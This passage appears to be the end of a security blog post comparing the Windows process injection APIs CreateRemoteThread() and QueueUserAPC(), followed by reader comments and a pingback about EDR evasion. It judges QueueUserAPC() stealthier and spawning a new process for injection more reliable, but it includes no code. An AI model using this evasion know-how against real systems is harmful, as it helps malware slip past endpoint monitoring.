QueueUserAPC() | Medium | 199 | 127 KB |
QueueUserAPC() | Low | 165 | 112 KB |
It’s worth mentioning the differences in the two process injection techniques we’ve looked at so far. It’s apparent that the CreateRemoteThread() is louder, easier to detect, and is the most common API call for process injection. CreateRemoteThread() Is also very reliable whereas QueueUserAPC() can be a bit unpredictable if you’re opening and already instantiated process and injecting into one of its threads. However, generating a process and injecting into it seems to create a much higher probability of success, as seen in all the examples above.
It’s fairly obvious that if you want to be quieter / more stealthy, QueueUserAPC() has the advantage.
Jeff
May 26, 2020at9:00 pmThanks for the posting. Very cool. Regarding the low level injection, custom.h and custom.asm are talked, could you please tell more about the two files, and how can I do a low level injection operation by myself?
tzar
June 16, 2020at10:37 amReally great couple of articles. Thanks for these. Looking forward to more! Had been doing alot of digging into various methods and this is a really nice overview and dive into the monitoring side of things.
Pingback: SysWhispers2 - AV/EDR Evasion Via Direct System Calls » wangSH!T
January 16, 2021at3:10 pmme
February 10, 2021at9:19 amawesome plz provide more like this thx